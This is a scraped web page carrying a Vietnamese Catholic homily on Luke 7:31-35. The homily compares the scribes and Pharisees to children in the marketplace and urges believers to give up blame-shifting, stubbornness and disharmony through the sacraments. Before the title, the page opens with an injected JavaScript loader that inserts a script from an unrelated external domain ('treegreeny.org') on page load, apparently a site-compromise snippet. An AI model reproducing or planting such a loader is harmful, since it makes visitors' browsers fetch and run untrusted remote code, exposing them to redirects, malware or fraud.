;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); TÔI PHẢI VÍ THẾ HỆ NÀY VỚI AI? – Xitô PS

TÔI PHẢI VÍ THẾ HỆ NÀY VỚI AI?

Suy Niệm Thứ 4 Tuần XXIV Lc 7, 31-35

Giới kinh sư và Pharisêu tự cho mình là chuẩn mực đạo đức, dân chúng cũng chấp thuận như thế. Nhưng Đức Giêsu thở dài nói:“Tôi phải ví thế hệ này với ai? Họ giống như lũ trẻ ngồi ngoài chợ”. Theo văn hóa Do thái lúc đó, đàn bà và trẻ con không tính, “lũ trẻ ngồi ngoài chợ” càng không đáng kể, vì đó là đám trẻ bụi đời. Vậy tại sao Chúa Giêsu ví giới lãnh đạo Do thái chỉ là một đám trẻ ngồi ngoài chợ?

 Thứ nhất, thói đổ thừa: Người trưởng thành là người biết nhận trách nhiệm, nhưng giới Kinh sư và Pharisêu không những đổ thừa, còn ra luật hợp thức hóa hành vi vô trách nhiệm. Thế nên, họ nhanh tay bó những gánh nặng chất lên vai người khác; và do tính đổ thừa được luật bảo hộ nên họ sẵn sàng bỏ mặc nạn nhân thiếu sống thừa chết để kịp về dâng lễ. Quả thực, hình ảnh thầy Lê vi và tư tế trông thấy nạn nhân thì tránh qua lối khác mà đi, vẫn như hiện thực. Vì thế, khi Gioan và Chúa Giêsu đến kêu gọi sám hối đón nhận Tin Mừng, họ nói tại Gio an quá nhiệm nhặt, nhếch nhác như bị ma ám quỷ nhập làm sao tin; còn ông Giêsu “ăn nhậu như người đời, bạn bè với quân thu thuế và phường tội lỗi”, tin sao nổi. Đổ thừa và vô trách nhiệm đã dẫn họ tới thái độ cố chấp.

Thứ hai tính cố chấp: Họ cố thủ trong đường lối của tiền nhân, không mở ra đón nhận luồng sinh khí mới được Thiên Chúa gửi tới qua lời mời gọi sám hối của Gioan, để đón nhận ơn cứu độ Đức Giêsu Kitô mang đến. Giam mình trong tự mãn, hiểu biết Kinh thánh và lề luật theo ý riêng, dẫn họ tới chỗ phủ nhận Đức Giêsu là Đấng cứu độ: “Ông này không phải là con ông Giuse và mẹ ông không phải là bà Maria sao? Đấng Mêsia đến, không ai trong chúng ta biết Người từ đâu đến. Cố chấp đến kiêu ngạo đã đẩy họ tới sự lạc điệu trong đời sống chung.

Cuối cùng là lạc điệu: Đức Giêsu dùng hình ảnh cụ thể diễn tả sự lạc điệu của giới Pharisêu và kinh sư: “Tụi tôi thổi sáo cho các anh mà các anh không nhảy múa; Tụi tôi hát bài đưa đám, mà các anh không khóc than”. Lúc đó dân chúng, cả những người thu thuế và gái điếm tạo thành dòng chảy tiến về sông Giodan gặp Gioan lãnh nhận ơn sám hối; Tiến đến với Đức Giê su đón nhận Tin mừng cứu độ, còn giới lãnh đạo Do thái, tự cho mình là chuẩn mực đạo đức, là rốn của vũ trụ. Họ tách ra khỏi dòng chảy của dân chúng, nếu họ có nhập đoàn chỉ tìm lỗi, tìm cớ để tố cáo Đức Giêsu.

Ba đặc tính: đổ thừa, cố chấp và lạc điệu đã đảy giới Kinh sư cùng Pharisêu tới sự vô cảm trước lỗi đau của người khác, đánh mất khả năng vui với người vui khóc với người khóc; thổi sáo mà không nhảy múa, hát bài đưa đám mà không than khóc”. Hơn hết, họ đánh mất ơn cứu độ, bởi thay vì đón nhận giáo huấn của Gioan và của Đức Giêsu, ngược lại họ đã trối từ, chỉ trích và chống đối. Họ không đón nhận, bởi nếu đón nhận họ phải đổi mới, mở ra cho những tương quan yêu thương với Thiên Chúa và đồng loại. Vì thế, họ cố thủ trong đường lối của họ và cha ông, nên họ mù lòa trước nỗi đau của tha nhân, điếc trước lời mời gọi của Tin Mừng.

Giới lãnh đạo Do thái ngày xưa đã khước từ ơn cứu độ của Đức Giêsu. Phần đông con người hôm nay, từ chối Tin Mừng và không đón nhận Đức Giêsu trong bất cứ hình thức nào. Chúng ta, những người tin Đức Giêsu, dù sống đời hôn nhân và ngay cả những người sống đời thánh hiến, ba tật xấu của giới Pharisêu và kinh sư, nó không chỉ tồn tại mà có lúc còn phát triển mạnh trong chính bản thân ta. Thực vậy, ta hãy nhìn lại mình xem, đã hơn một lần ta đổ thừa vì trời mưa, vì đường xa, vì tôi bận, vì cha ấy giảng dài lên tôi không đi lễ, kể cả lễ Chúa nhật; Cũng đã hơn một lần, ta cố thủ trong lối sống của mình không mở ra với anh chị em, và hơn hết là không mở ra đón nhận luồng sinh khí mới của Thiên Chúa được thông ban qua các bí tích; Và đã hơn một lần vì sự khép kín mà ta trở nên lạc điệu ngay giữa gia đình mình và cộng đoàn của mình.

Lời Chúa hôm nay, không chỉ nhắc nhở giới lãnh đạo Do thái, hơn hết đó là lời thức tỉnh mỗi người chúng ta, hãy luôn biết mở ra với lời mời gọi của Thiên Chúa qua việc lãnh nhận các bí tích. Nhất là bí tích Hòa giải và Thánh Thể. Vậy qua thánh lễ này, chúng ta cùng cầu xin Chúa thanh tẩy, loại trừ những tật xấu, thói đổ lỗi cho người khác, cố chấp, thói sống lạc điệu lạc tông trong đời sống chung- đời sống gia đình, đời sống cộng đoàn; và xin Chúa ban cho ta đức mến là sợi dây duy nhất giúp ta nhảy đúng những nhịp điệu của đời sống chung, là động lực duy nhất cho ta khả năng dám nhận trách nhiệm mà còn giúp ta dám cúi xuống đồng cảnh ngộ với tha nhân và vực họ dậy để cùng nhau tiến về trời dưới ánh sáng Tin mừng.

FM. Tùy Phúc Hậu

You May Also Like

Trả lời

X